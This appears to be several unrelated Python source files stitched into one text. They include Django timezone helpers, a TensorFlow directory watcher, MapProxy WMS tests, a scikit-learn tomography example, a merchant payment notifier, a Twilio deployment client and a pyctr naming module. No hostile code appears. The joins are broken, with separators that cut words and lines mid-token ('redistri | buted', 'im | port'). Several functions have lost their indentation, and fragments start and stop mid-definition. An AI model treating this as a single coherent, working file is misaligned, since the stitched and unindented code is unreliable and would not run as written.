# for regular tzinfo objects
return timezone.tzname(None)
# Timezone selection functions.
# These functions don't change os.environ['TZ'] and call time.tzset()
# because it isn't thread safe.
def activate(timezone):
"""
Sets the time zone for the current thread.
The ``timezone`` argument must be an instance of a tzinfo subclass or a
time zone name. If it is a time zone name, pytz is required.
"""
if isinstance(timezone, tzinfo):
_active.value = timezone
elif isinstance(timezone, six.string_types) and pytz is not None:
_active.value = pytz.timezone(timezone)
else:
raise ValueError("Invalid timezone: %r" % timezone)
def deactivate():
"""
Unsets the time zone for the current thread.
Django will then use the time zone defined by settings.TIME_ZONE.
"""
if hasattr(_active, "value"):
del _active.value
class override(object):
    """
    Context manager that temporarily sets the current thread's time zone.

    Entry uses ``~django.utils.timezone.activate()`` with the given
    ``timezone``; exit restores whatever was active before.  ``timezone``
    may be a ``tzinfo`` subclass instance, a time zone name (pytz
    required), or ``None``, which enables the default time zone.
    """

    def __init__(self, timezone):
        self.timezone = timezone
        # Snapshot the previously active zone (None when nothing is set).
        self.old_timezone = getattr(_active, 'value', None)

    def __enter__(self):
        if self.timezone is not None:
            activate(self.timezone)
        else:
            deactivate()

    def __exit__(self, exc_type, exc_value, traceback):
        if self.old_timezone is not None:
            _active.value = self.old_timezone
        else:
            deactivate()
# Templates
def template_localtime(value, use_tz=None):
    """
    Convert ``value`` to local time when it is an aware datetime and time
    zone support is enabled.

    ``use_tz``, when not None, overrides settings.USE_TZ.  Datetimes can
    opt out via a falsy ``convert_to_local_time`` attribute.  Designed
    for use by the template engine.
    """
    if not isinstance(value, datetime):
        return value
    enabled = settings.USE_TZ if use_tz is None else use_tz
    if not enabled:
        return value
    if is_naive(value):
        return value
    if not getattr(value, 'convert_to_local_time', True):
        return value
    return localtime(value)
# Utilities
def localtime(value, timezone=None):
    """
    Convert an aware datetime.datetime to local wall-clock time.

    Local time is defined by the currently active time zone unless
    ``timezone`` is given explicitly.  For pytz zones, the result is
    additionally normalized to fix offsets around DST transitions.
    """
    tz = get_current_timezone() if timezone is None else timezone
    converted = value.astimezone(tz)
    normalize = getattr(tz, 'normalize', None)
    if normalize is not None:
        # Only pytz time zones provide normalize().
        converted = normalize(converted)
    return converted
def now():
    """
    Return the current datetime: aware in UTC when settings.USE_TZ is
    enabled, naive local time otherwise.
    """
    if not settings.USE_TZ:
        return datetime.now()
    # utcnow()+replace was measured faster than datetime.now(tz=utc).
    return datetime.utcnow().replace(tzinfo=utc)
# By design, these four functions don't perform any checks on their arguments.
# The caller should ensure that they don't receive an invalid value like None.
def is_aware(value):
    """
    Return True when the given datetime.datetime is time-zone aware.

    Follows the definition in Python's docs: a datetime is aware iff it
    carries a tzinfo whose utcoffset() is not None:
    http://docs.python.org/library/datetime.html#datetime.tzinfo
    """
    tz = value.tzinfo
    return tz is not None and tz.utcoffset(value) is not None
def is_naive(value):
"""
Determines if a given datetime.datetime is naive.
The logic is described in Python's docs:
http://docs.python.or |
#-------------------------------------------------------------------------
#
# Copyright (c) 2009, IMB, RWTH Aachen.
# All rights reserved.
#
# This software is provided without warranty under the terms of the BSD
# license included in simvisage/LICENSE.txt and may be redistri | buted only
# under the conditions described in the aforementioned license. The license
# is also available online at http://www.simvisage.com/licenses/BSD.txt
#
# Thanks for using Simvisage open source!
#
# Created on Nov 18, 2011 by: matthias
from traits.api import | \
provides
from oricreate.opt import \
IFu
from .fu import \
Fu
@provides(IFu)
class FuPotEngBending(Fu):
    '''Optimization criteria based on minimum Bending energy of gravity.

    This plug-in class lets the crease pattern operators evaluate the
    integral over the spatial domain in an instantaneous configuration.
    '''

    def get_f(self, t=0):
        '''Get the bending energy of gravity.'''
        formed = self.forming_task.formed_object
        return formed.V

    def get_f_du(self, t=0):
        '''Get the derivatives with respect to individual displacements.'''
        formed = self.forming_task.formed_object
        return formed.V_du
|
"""Contains the implementation for the DirectoryWatcher class."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
from tensorflow.python.platform import gfile
from tensorflow.python.platform im | port logging
class DirectoryWatcher(object):
  """A DirectoryWatcher wraps a loader to load from a directory.

  A loader reads a file on disk and produces some kind of values as an
  iterator. A DirectoryWatcher takes a directory with one file at a time
  being written to and a factory for loaders, and reads the files in
  lexicographic order.

  This class is *only* valid under the assumption that files are never removed
  and the only file ever changed is whichever one is lexicographically last.
  """

  def __init__(self, directory, loader_factory, path_filter=lambda x: True):
    """Constructs a new DirectoryWatcher.

    Args:
      directory: The directory to watch. The directory doesn't have to exist.
      loader_factory: A factory for creating loaders. The factory should take a
        file path and return an object that has a Load method returning an
        iterator that will yield all events that have not been yielded yet.
      path_filter: Only files whose full path matches this predicate will be
        loaded. If not specified, all files are loaded.

    Raises:
      ValueError: If directory or loader_factory is None.
    """
    if directory is None:
      raise ValueError('A directory is required')
    if loader_factory is None:
      raise ValueError('A loader factory is required')
    self._directory = directory
    self._loader_factory = loader_factory
    self._loader = None
    self._path = None
    self._path_filter = path_filter

  def Load(self):
    """Loads new values from disk.

    The watcher will load from one file at a time; as soon as that file stops
    yielding events, it will move on to the next file. We assume that old files
    are never modified after a newer file has been written. As a result, Load()
    can be called multiple times in a row without losing events that have not
    been yielded yet. In other words, we guarantee that every event will be
    yielded exactly once.

    Yields:
      All values that were written to disk that have not been yielded yet.
    """
    # Lazily create the loader on first use.
    if not self._loader:
      try:
        self._InitializeLoader()
      except StopIteration:
        # No files in the directory yet: nothing to yield.  Return instead
        # of letting StopIteration escape — under PEP 479 (Python 3.7+), a
        # StopIteration raised inside a generator becomes a RuntimeError.
        return
    while True:
      # Yield all the new events in the file we're currently loading from.
      for event in self._loader.Load():
        yield event
      next_path = self._GetNextPath()
      if not next_path:
        logging.info('No more files in %s', self._directory)
        # Current file is empty and there are no new files, so we're done.
        return
      # There's a new file, so check to make sure there weren't any events
      # written between when we finished reading the current file and when we
      # checked for the new one. The sequence of events might look something
      # like this:
      #
      # 1. Event #1 written to file #1.
      # 2. We check for events and yield event #1 from file #1
      # 3. We check for events and see that there are no more events in file #1.
      # 4. Event #2 is written to file #1.
      # 5. Event #3 is written to file #2.
      # 6. We check for a new file and see that file #2 exists.
      #
      # Without this loop, we would miss event #2. We're also guaranteed by the
      # loader contract that no more events will be written to file #1 after
      # events start being written to file #2, so we don't have to worry about
      # that.
      for event in self._loader.Load():
        yield event
      logging.info('Directory watcher for %s advancing to file %s',
                   self._directory, next_path)
      # Advance to the next file and start over.
      self._SetPath(next_path)

  def _InitializeLoader(self):
    """Points the watcher at the first file; raises StopIteration if none."""
    path = self._GetNextPath()
    if path:
      self._SetPath(path)
    else:
      raise StopIteration

  def _SetPath(self, path):
    # Remember the current file and build a fresh loader for it.
    self._path = path
    self._loader = self._loader_factory(path)

  def _GetNextPath(self):
    """Returns the path of the next file to use or None if no file exists."""
    sorted_paths = [os.path.join(self._directory, path)
                    for path in sorted(gfile.ListDirectory(self._directory))]
    # We filter here so the filter gets the full directory name.
    # Guard against self._path being None on the first scan: comparing
    # str > None raises TypeError on Python 3.
    filtered_paths = (path for path in sorted_paths
                      if self._path_filter(path) and
                      (self._path is None or path > self._path))
    return next(filtered_paths, None)
|
# This file is part of the MapProxy project.
# Copyright (C) 2014 Omniscale <http://omniscale.de>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import division
from mapproxy.request.wms import WMS111MapRequest, WMS111CapabilitiesRequest
from mapproxy.test.system import module_setup, module_teardown, SystemTest, make_base_config
from mapproxy.test.image import is_png, is_transparent
from mapproxy.test.image import tmp_image, assert_colors_equal, img_from_buf
from mapproxy.test.http import mock_httpd
from mapproxy.test.system.test_wms import bbox_srs_from_boundingbox
from mapproxy.test.unit.test_grid import assert_almost_equal_bbox
from nose.tools import eq_
# Shared mutable config dict, populated by module_setup() below.
test_config = {}
base_config = make_base_config(test_config)
def setup_module():
    # nose module-level fixture: build the test app from wms_srs_extent.yaml.
    module_setup(test_config, 'wms_srs_extent.yaml')
def teardown_module():
    # nose module-level fixture: remove the temporary test environment.
    module_teardown(test_config)
class TestWMSSRSExtentTest(SystemTest):
    # System tests for WMS layers with per-SRS extent restrictions
    # (configuration loaded from wms_srs_extent.yaml by setup_module).
    config = test_config
    def setup(self):
        SystemTest.setup(self)
        # Base WMS 1.1.1 request shared by the test methods.
        self.common_req = WMS111MapRequest(url='/service?', param=dict(service='WMS',
                                                                       version='1.1.1'))
    def test_wms_capabilities(self):
        # GetCapabilities must advertise per-SRS bounding boxes for each layer.
        req = WMS111CapabilitiesRequest(url='/service?').copy_with_request_params(self.common_req)
        resp = self.app.get(req)
        eq_(resp.content_type, 'application/vnd.ogc.wms_xml')
        xml = resp.lxml
        bboxs = xml.xpath('//Layer/Layer[1]/BoundingBox')
        bboxs = dict((e.attrib['SRS'], e) for e in bboxs)
        # First sub-layer: full configured extent per SRS.
        assert_almost_equal_bbox(
            bbox_srs_from_boundingbox(bboxs['EPSG:31467']),
            [2750000.0, 5000000.0, 4250000.0, 6500000.0])
        assert_almost_equal_bbox(
            bbox_srs_from_boundingbox(bboxs['EPSG:25832']),
            [0.0, 3500000.0, 1000000.0, 8500000.0])
        assert_almost_equal_bbox(
            bbox_srs_from_boundingbox(bboxs['EPSG:3857']),
            [-20037508.3428, -147730762.670, 20037508.3428, 147730758.195])
        assert_almost_equal_bbox(
            bbox_srs_from_boundingbox(bboxs['EPSG:4326']),
            [-180.0, -90.0, 180.0, 90.0])
        # bboxes clipped to coverage
        bboxs = xml.xpath('//Layer/Layer[2]/BoundingBox')
        bboxs = dict((e.attrib['SRS'], e) for e in bboxs)
        assert_almost_equal_bbox(
            bbox_srs_from_boundingbox(bboxs['EPSG:31467']),
            [3213331.57335, 5540436.91132, 3571769.72263, 6104110.432])
        assert_almost_equal_bbox(
            bbox_srs_from_boundingbox(bboxs['EPSG:25832']),
            [213372.048961, 5538660.64621, 571666.447504, 6102110.74547])
        assert_almost_equal_bbox(
            bbox_srs_from_boundingbox(bboxs['EPSG:3857']),
            [556597.453966, 6446275.84102, 1113194.90793, 7361866.11305])
        assert_almost_equal_bbox(
            bbox_srs_from_boundingbox(bboxs['EPSG:4326']),
            [5.0, 50.0, 10.0, 55.0])
    def test_out_of_extent(self):
        # BBOX entirely outside the layer extent: no upstream request is
        # made and the service must answer with an empty image.
        resp = self.app.get('http://localhost/service?SERVICE=WMS&REQUEST=GetMap'
                            '&LAYERS=direct&STYLES='
                            '&WIDTH=100&HEIGHT=100&FORMAT=image/png'
                            '&BBOX=-10000,0,0,1000&SRS=EPSG:25832'
                            '&VERSION=1.1.0&TRANSPARENT=TRUE')
        # empty/transparent response
        eq_(resp.content_type, 'image/png')
        assert is_png(resp.body)
        assert is_transparent(resp.body)
    def test_out_of_extent_bgcolor(self):
        # Same out-of-extent request with TRANSPARENT=FALSE: expect a
        # solid image filled with the requested BGCOLOR.
        resp = self.app.get('http://localhost/service?SERVICE=WMS&REQUEST=GetMap'
                            '&LAYERS=direct&STYLES='
                            '&WIDTH=100&HEIGHT=100&FORMAT=image/png'
                            '&BBOX=-10000,0,0,1000&SRS=EPSG:25832'
                            '&VERSION=1.1.0&TRANSPARENT=FALSE&BGCOLOR=0xff0000')
        # red response
        eq_(resp.content_type, 'image/png')
        assert is_png(resp.body)
        assert_colors_equal(img_from_buf(resp.body).convert('RGBA'),
                            [(100 * 100, [255, 0, 0, 255])])
    def test_clipped(self):
        # BBOX partially outside the extent: the upstream request must be
        # clipped to the intersection (WIDTH=75 of the requested 100).
        with tmp_image((256, 256), format='png', color=(255, 0, 0)) as img:
            expected_req = ({'path':
                             r'/service?LAYERs=bar&SERVICE=WMS&FORMAT=image%2Fpng'
                             '&REQUEST=GetMap&HEIGHT=100&SRS=EPSG%3A25832&styles='
                             '&VERSION=1.1.1&BBOX=0.0,3500000.0,150.0,3500100.0'
                             '&WIDTH=75'},
                            {'body': img.read(), 'headers': {'content-type': 'image/png'}})
            with mock_httpd(('localhost', 42423), [expected_req]):
                resp = self.app.get('http://localhost/service?SERVICE=WMS&REQUEST=GetMap'
                                    '&LAYERS=direct&STYLES='
                                    '&WIDTH=100&HEIGHT=100&FORMAT=image/png'
                                    '&BBOX=-50,3500000,150,3500100&SRS=EPSG:25832'
                                    '&VERSION=1.1.0&TRANSPARENT=TRUE')
                eq_(resp.content_type, 'image/png')
                assert is_png(resp.body)
                colors = sorted(img_from_buf(resp.body).convert('RGBA').getcolors())
                # quarter is clipped, check if it's transparent
                eq_(colors[0][0], (25 * 100))
                eq_(colors[0][1][3], 0)
                eq_(colors[1], (75 * 100, (255, 0, 0, 255)))
    def test_clipped_bgcolor(self):
        # Clipped request with an opaque background: the uncovered half
        # must be filled with BGCOLOR (green), the covered half red.
        with tmp_image((256, 256), format='png', color=(255, 0, 0)) as img:
            expected_req = ({'path':
                             r'/service?LAYERs=bar&SERVICE=WMS&FORMAT=image%2Fpng'
                             '&REQUEST=GetMap&HEIGHT=100&SRS=EPSG%3A25832&styles='
                             '&VERSION=1.1.1&BBOX=0.0,3500000.0,100.0,3500100.0'
                             '&WIDTH=50'},
                            {'body': img.read(), 'headers': {'content-type': 'image/png'}})
            with mock_httpd(('localhost', 42423), [expected_req]):
                resp = self.app.get('http://localhost/service?SERVICE=WMS&REQUEST=GetMap'
                                    '&LAYERS=direct&STYLES='
                                    '&WIDTH=100&HEIGHT=100&FORMAT=image/png'
                                    '&BBOX=-100,3500000,100,3500100&SRS=EPSG:25832'
                                    '&VERSION=1.1.0&TRANSPARENT=FALSE&BGCOLOR=0x00ff00')
                eq_(resp.content_type, 'image/png')
                assert is_png(resp.body)
                assert_colors_equal(img_from_buf(resp.body).convert('RGBA'),
                                    [(50 * 100, [255, 0, 0, 255]), (50 * 100, [0, 255, 0, 255])])
|
"""
======================================================================
Compressive sensing: tomography reconstruction with L1 prior (Lasso)
======================================================================
This example shows the reconstruction of an image from a set of parallel
projections, acquired along different angles. Such a dataset is acquired in
**computed tomography** (CT).
Without any prior information on the sample, the number of projections
required to reconstruct the image is of the order of the linear size
``l`` of the image (in pixels). For simplicity we consider here a sparse
image, where only pixels on the boundary of objects have a non-zero
value. Such data could correspond for example to a cellular material.
Note however that most images are sparse in a different basis, such as
the Haar wavelets. Only ``l/7`` projections are acquired, therefore it is
necessary to use prior information available on the sample (its
sparsity): this is an example of **compressive sensing**.
The tomography projection operation is a linear transformation. In
addition to the data-fidelity term corresponding to a linear regression,
we penalize the L1 norm of the image to account for its sparsity. The
resulting optimization problem is called the :ref:`lasso`. We use the
class :class:`sklearn.linear_model.Lasso`, that uses the coordinate descent
algorithm. Importantly, this implementation is more computationally efficient
on a sparse matrix, than the projection operator used here.
The reconstruction with L1 penalization gives a result with zero error
(all pixels are successfully labeled with 0 or 1), even if noise was
added to the projections. In comparison, an L2 penalization
(:class:`sklearn.linear_model.Ridge`) produces a large number of labeling
errors for the pixels. Important artifacts are observed on the
reconstructed image, contrary to the L1 penalization. Note in particular
the circular artifact separating the pixels in the corners, that have
contributed to fewer projections than the central disk.
"""
print(__doc__)
# Author: Emmanuelle Gouillart <emmanuelle.gouillart@nsup.org>
# License: BSD 3 clause
import numpy as np
from scipy import sparse
from scipy import ndimage
from sklearn.linear_model import Lasso
from sklearn.linear_model import Ridge
import matplotlib.pyplot as plt
def _weights(x, dx=1, orig=0):
    """Linear-interpolation weights of samples ``x`` on a regular grid.

    Each sample is split between its two neighbouring grid cells.  Returns
    the stacked cell indices (as floats) and the matching weights.
    """
    x = np.ravel(x)
    lower = np.floor((x - orig) / dx)
    frac = (x - orig - lower * dx) / dx
    indices = np.hstack((lower, lower + 1))
    weights = np.hstack((1 - frac, frac))
    return indices, weights
def _generate_center_coordinates(l_x):
    """Pixel-center coordinates of an l_x x l_x image, origin at the center."""
    X, Y = np.mgrid[:l_x, :l_x].astype(np.float64)
    # Shift so pixel centers are symmetric around 0.
    shift = l_x / 2. - 0.5
    return X - shift, Y - shift
def build_projection_operator(l_x, n_dir):
    """ Compute the tomography design matrix.

    Parameters
    ----------

    l_x : int
        linear size of image array

    n_dir : int
        number of angles at which projections are acquired. Floats are
        accepted and truncated (the module-level call passes ``l / 7.``),
        since np.linspace requires an integral ``num``.

    Returns
    -------
    p : sparse matrix of shape (n_dir l_x, l_x**2)
    """
    n_dir = int(n_dir)  # np.linspace rejects non-integer ``num``.
    X, Y = _generate_center_coordinates(l_x)
    angles = np.linspace(0, np.pi, n_dir, endpoint=False)
    data_inds, weights, camera_inds = [], [], []
    # Each image pixel contributes to two detector bins, hence the doubling.
    data_unravel_indices = np.arange(l_x ** 2)
    data_unravel_indices = np.hstack((data_unravel_indices,
                                      data_unravel_indices))
    for i, angle in enumerate(angles):
        # Project pixel centers onto the detector axis for this angle.
        Xrot = np.cos(angle) * X - np.sin(angle) * Y
        inds, w = _weights(Xrot, dx=1, orig=X.min())
        # _weights returns integral floats; sparse index arrays must be
        # integer-typed (recent SciPy rejects float indices).
        inds = inds.astype(np.int64)
        mask = np.logical_and(inds >= 0, inds < l_x)
        weights += list(w[mask])
        camera_inds += list(inds[mask] + i * l_x)
        data_inds += list(data_unravel_indices[mask])
    # Pass the shape explicitly so empty trailing rows are preserved.
    proj_operator = sparse.coo_matrix((weights, (camera_inds, data_inds)),
                                      shape=(n_dir * l_x, l_x ** 2))
    return proj_operator
def generate_synthetic_data(l=128, n_pts=36, seed=0):
    """ Synthetic binary data: boundary pixels of random blobs in a disk.

    Parameters
    ----------
    l : int
        Linear size of the square image (default matches the module-level
        ``l`` so existing no-argument calls behave as before).
    n_pts : int
        Number of random seed points used to grow the blobs.
    seed : int
        Seed for the random generator; output is deterministic.

    Returns
    -------
    ndarray of bool, shape (l, l)
        True only on object boundary pixels.
    """
    rs = np.random.RandomState(seed)
    x, y = np.ogrid[0:l, 0:l]
    # Circular field of view centered in the image.
    mask_outer = (x - l / 2.) ** 2 + (y - l / 2.) ** 2 < (l / 2.) ** 2
    mask = np.zeros((l, l))
    points = l * rs.rand(2, n_pts)
    # np.int was removed in NumPy 1.24; use the builtin int as dtype.
    mask[(points[0]).astype(int), (points[1]).astype(int)] = 1
    mask = ndimage.gaussian_filter(mask, sigma=l / n_pts)
    res = np.logical_and(mask > mask.mean(), mask_outer)
    # XOR with the erosion keeps only the one-pixel object boundaries.
    return np.logical_xor(res, ndimage.binary_erosion(res))
# Generate synthetic images, and projections
l = 128
# Number of projection angles (~l/7). Integer division: np.linspace,
# called inside build_projection_operator, requires an integral ``num``
# (floats raise TypeError in modern NumPy).
proj_operator = build_projection_operator(l, l // 7)
data = generate_synthetic_data()
proj = proj_operator * data.ravel()[:, np.newaxis]
proj += 0.15 * np.random.randn(*proj.shape)

# Reconstruction with L2 (Ridge) penalization
rgr_ridge = Ridge(alpha=0.2)
rgr_ridge.fit(proj_operator, proj.ravel())
rec_l2 = rgr_ridge.coef_.reshape(l, l)

# Reconstruction with L1 (Lasso) penalization
# the best value of alpha was determined using cross validation
# with LassoCV
rgr_lasso = Lasso(alpha=0.001)
rgr_lasso.fit(proj_operator, proj.ravel())
rec_l1 = rgr_lasso.coef_.reshape(l, l)

# Plot the original image next to the two reconstructions.
plt.figure(figsize=(8, 3.3))
plt.subplot(131)
plt.imshow(data, cmap=plt.cm.gray, interpolation='nearest')
plt.axis('off')
plt.title('original image')
plt.subplot(132)
plt.imshow(rec_l2, cmap=plt.cm.gray, interpolation='nearest')
plt.title('L2 penalization')
plt.axis('off')
plt.subplot(133)
plt.imshow(rec_l1, cmap=plt.cm.gray, interpolation='nearest')
plt.title('L1 penalization')
plt.axis('off')
plt.subplots_adjust(hspace=0.01, wspace=0.01, top=1, bottom=0, left=0,
                    right=1)
plt.show()
|
# -*- coding: UTF-8 -*-
import logging
from model_utils import Choices
from simptools.wrappers.http import HttpClient, HttpRequest
from requests.exceptions import ConnectionError
from payway.merchants.models import Merchant
__author__ = 'Razzhivin Alexander'
__email__ = 'admin@httpbots.com'
RESPONSE_STATUS = Choices(
    ('OK', 'OK'),
)
class MerchantHttpRequest(HttpRequest):
    """HTTP request that reports an order's state to a merchant's result URL.

    The payload is attached as GET or POST data depending on the
    merchant's configured ``result_url_method``.
    """

    def __init__(self, merchant, order):
        self.merchant = merchant
        self.order = order
        use_get = self.merchant.result_url_method == Merchant.URL_METHODS.GET
        if use_get:
            self.__set_GET()
        else:
            self.__set_POST()

    def __set_POST(self, *args, **kwargs):
        # Attach the payload as POST data.
        self.POST = self.__request()

    def __set_GET(self, *args, **kwargs):
        # Attach the payload as GET data.
        self.GET = self.__request()

    def __request(self):
        order = self.order
        return {
            'url': self.merchant.result_url,
            'data': {
                'uid': order.uid,
                'is_paid': order.is_paid,
                'sum': order.sum.amount,
                'sum_currency': order.sum_currency,
                'description': order.description,
            }
        }
class MerchantHttpClient(HttpClient):
    """HTTP client that delivers order notifications to merchants."""

    @classmethod
    def notify(cls, merchant, order):
        """Send the order payload to the merchant's result URL.

        Returns the merchant's response body, or '' when the connection
        failed (the failure is logged, not raised — best effort).
        """
        result = ''
        try:
            request = MerchantHttpRequest(merchant, order)
            response = cls.execute(request)
            result = response.text
        except ConnectionError:
            # logging.warn is a deprecated alias; use logging.warning.
            logging.warning('Problems when connecting to merchant {0}'.format(merchant.result_url))
        return result
|
:param int limit: Upper limit for the number of records to return. list() guarantees
never to return more than limit. Default is no limit
:param int page_size: Number of records to fetch per request, when not set will use
the default value of 50 records. If no page_size is defined
but a limit is defined, list() will attempt to read the limit
with the most efficient page size, i.e. min(limit, 1000)
:returns: Generator that will yield up to limit results
:rtype: list[twilio.rest.serverless.v1.service.environment.deployment.DeploymentInstance]
"""
return list(self.stream(limit=limit, page_size=page_size, ))
def page(self, page_token=values.unset, page_number=values.unset,
page_size=values.unset):
"""
Retrieve a single page of DeploymentInstance records from the API.
Request is executed immediately
:param str page_token: PageToken provided by the API
:param int page_number: Page Number, this value is simply for client state
:param int page_size: Number of records to return, defaults to 50
:returns: Page of DeploymentInstance
:rtype: twilio.rest.serverless.v1.service.environment.deployment.DeploymentPage
"""
params = values.of({'PageToken': page_token, 'Page': page_number, 'PageSize': page_size, })
response = self._version.page(
'GET',
self._uri,
params=params,
)
return DeploymentPage(self._version, response, self._solution)
def get_page(self, target_url):
"""
Retrieve a specific page of DeploymentInstance records from the API.
Request is executed immediately
:param str target_url: API-generated URL for the requested results page
:returns: Page of DeploymentInstance
:rtype: twilio.rest.serverless.v1.service.environment.deployment.DeploymentPage
"""
response = self._version.domain.twilio.request(
'GET',
target_url,
)
return DeploymentPage(self._version, response, self._solution)
def create(self, build_sid):
"""
Create a new DeploymentInstance
:param unicode build_sid: The SID of the build for the deployment
:returns: Newly created DeploymentInstance
:rtype: twilio.rest.serverless.v1.service.environment.deployment.DeploymentInstance
"""
data = values.of({'BuildSid': build_sid, })
payload = self._version.create(
'POST',
self._uri,
data=data,
)
return DeploymentInstance(
self._version,
payload,
service_sid=self._solution['service_sid'],
environment_sid=self._solution['environment_sid'],
)
def get(self, sid):
"""
Constructs a DeploymentContext
:param sid: The SID that identifies the Deployment resource to fetch
:returns: twilio.rest.serverless.v1.service.environment.deployment.DeploymentContext
:rtype: twilio.rest.serverless.v1.service.environment.deployment.DeploymentContext
"""
return DeploymentContext(
self._version,
service_sid=self._solution['service_sid'],
environment_sid=self._solution['environment_sid'],
sid=sid,
)
def __call__(self, sid):
"""
Constructs a DeploymentContext
:param sid: The SID that identifies the Deployment resource to fetch
:returns: twilio.rest.serverless.v1.service.environment.deployment.DeploymentContext
:rtype: twilio.rest.serverless.v1.service.environment.deployment.DeploymentContext
"""
return DeploymentContext(
self._version,
service_sid=self._solution['service_sid'],
environment_sid=self._solution['environment_sid'],
sid=sid,
)
    def __repr__(self):
        """
        Provide a friendly representation

        :returns: Machine friendly representation
        :rtype: str
        """
        # The list resource has no identifying parameters to include.
        return '<Twilio.Serverless.V1.DeploymentList>'
class DeploymentPage(Page):
    """ PLEASE NOTE that this class contains preview products that are subject
    to change. Use them with caution. If you currently do not have developer
    preview access, please contact help@twilio.com. """

    def __init__(self, version, response, solution):
        """
        Initialize the DeploymentPage

        :param Version version: Version that contains the resource
        :param Response response: Response from the API
        :param service_sid: The SID of the Service that the Deployment resource is associated with
        :param environment_sid: The SID of the environment for the deployment

        :returns: twilio.rest.serverless.v1.service.environment.deployment.DeploymentPage
        :rtype: twilio.rest.serverless.v1.service.environment.deployment.DeploymentPage
        """
        super(DeploymentPage, self).__init__(version, response)
        # Path Solution
        self._solution = solution

    def get_instance(self, payload):
        """
        Build an instance of DeploymentInstance

        :param dict payload: Payload response from the API

        :returns: twilio.rest.serverless.v1.service.environment.deployment.DeploymentInstance
        :rtype: twilio.rest.serverless.v1.service.environment.deployment.DeploymentInstance
        """
        solution = self._solution
        return DeploymentInstance(
            self._version,
            payload,
            service_sid=solution['service_sid'],
            environment_sid=solution['environment_sid'],
        )

    def __repr__(self):
        """
        Provide a friendly representation

        :returns: Machine friendly representation
        :rtype: str
        """
        return '<Twilio.Serverless.V1.DeploymentPage>'
class DeploymentContext(InstanceContext):
    """ PLEASE NOTE that this class contains preview products that are subject
    to change. Use them with caution. If you currently do not have developer
    preview access, please contact help@twilio.com. """

    def __init__(self, version, service_sid, environment_sid, sid):
        """
        Initialize the DeploymentContext

        :param Version version: Version that contains the resource
        :param service_sid: The SID of the Service to fetch the Deployment resource from
        :param environment_sid: The SID of the environment used by the Deployment to fetch
        :param sid: The SID that identifies the Deployment resource to fetch

        :returns: twilio.rest.serverless.v1.service.environment.deployment.DeploymentContext
        :rtype: twilio.rest.serverless.v1.service.environment.deployment.DeploymentContext
        """
        super(DeploymentContext, self).__init__(version)
        # Path Solution
        self._solution = {
            'service_sid': service_sid,
            'environment_sid': environment_sid,
            'sid': sid,
        }
        self._uri = ('/Services/{service_sid}/Environments/{environment_sid}'
                     '/Deployments/{sid}').format(**self._solution)

    def fetch(self):
        """
        Fetch a DeploymentInstance

        :returns: Fetched DeploymentInstance
        :rtype: twilio.rest.serverless.v1.service.environment.deployment.DeploymentInstance
        """
        payload = self._version.fetch('GET', self._uri, params=values.of({}))
        return DeploymentInstance(
            self._version,
            payload,
            service_sid=self._solution['service_sid'],
            environment_sid=self._solution['environment_sid'],
            sid=self._solution['sid'],
        )

    def __repr__(self):
        """
        Provide a friendly representation

        :returns: Machine friendly representation
        :rtype: str
        """
        context = ' '.join('{}={}'.format(k, v) for k, v in self._solution.items())
        return '<Twilio.Serverless.V1.DeploymentContext {}>'.format(context)
clas |
# Copyright 2019 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Utilities for manipulating qualified names.
A qualified name is a uniform way to refer to simple (e.g. 'foo') and composite
(e.g. 'foo.bar') syntactic symbols.
This is *not* related to the __qualname__ attribute used by inspect, which
refers to scopes.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import gast
from pyctr.core import anno
from pyctr.core import parsing
class Symbol(collections.namedtuple('Symbol', ['name'])):
  """Represents a Python symbol (a simple name such as ``foo``)."""
class StringLiteral(collections.namedtuple('StringLiteral', ['value'])):
  """Represents a Python string literal."""

  def __str__(self):
    # Render with quotes, the way the literal appears in source code.
    return "'{}'".format(self.value)

  def __repr__(self):
    return self.__str__()
class NumberLiteral(collections.namedtuple('NumberLiteral', ['value'])):
  """Represents a Python numeric literal."""

  def __str__(self):
    # Render the bare number, as it appears in source code.
    return str(self.value)

  def __repr__(self):
    return self.__str__()
# TODO(mdanatg): Use subclasses to remove the has_attr has_subscript booleans.
class QN(object):
  """Represents a qualified name.

  A QN is either a simple symbol/literal, an attribute access on a parent
  QN, or a subscript of a parent QN; attr and subscript are mutually
  exclusive.
  """
  def __init__(self, base, attr=None, subscript=None):
    if attr is not None and subscript is not None:
      raise ValueError('A QN can only be either an attr or a subscript, not '
                       'both: attr={}, subscript={}.'.format(attr, subscript))
    self._has_attr = False
    self._has_subscript = False
    if attr is not None:
      if not isinstance(base, QN):
        raise ValueError(
            'for attribute QNs, base must be a QN; got instead "%s"' % base)
      if not isinstance(attr, str):
        raise ValueError('attr may only be a string; got instead "%s"' % attr)
      self._parent = base
      # TODO(mdanatg): Get rid of the tuple - it can only have 1 or 2 elements now.
      self.qn = (base, attr)
      self._has_attr = True
    elif subscript is not None:
      if not isinstance(base, QN):
        raise ValueError('For subscript QNs, base must be a QN.')
      self._parent = base
      self.qn = (base, subscript)
      self._has_subscript = True
    else:
      if not isinstance(base, (str, StringLiteral, NumberLiteral)):
        # TODO(mdanatg): Require Symbol instead of string.
        raise ValueError(
            'for simple QNs, base must be a string or a Literal object;'
            ' got instead "%s"' % type(base))
      # NOTE(review): assert-based validation is stripped under -O.
      assert '.' not in base and '[' not in base and ']' not in base
      self._parent = None
      self.qn = (base,)
  def is_symbol(self):
    """Returns True for simple QNs whose base is a plain string symbol."""
    return isinstance(self.qn[0], str)
  def is_simple(self):
    """Returns True when this QN has no attr/subscript component."""
    return len(self.qn) <= 1
  def is_composite(self):
    """Returns True for attribute or subscript QNs."""
    return len(self.qn) > 1
  def has_subscript(self):
    return self._has_subscript
  def has_attr(self):
    return self._has_attr
  @property
  def parent(self):
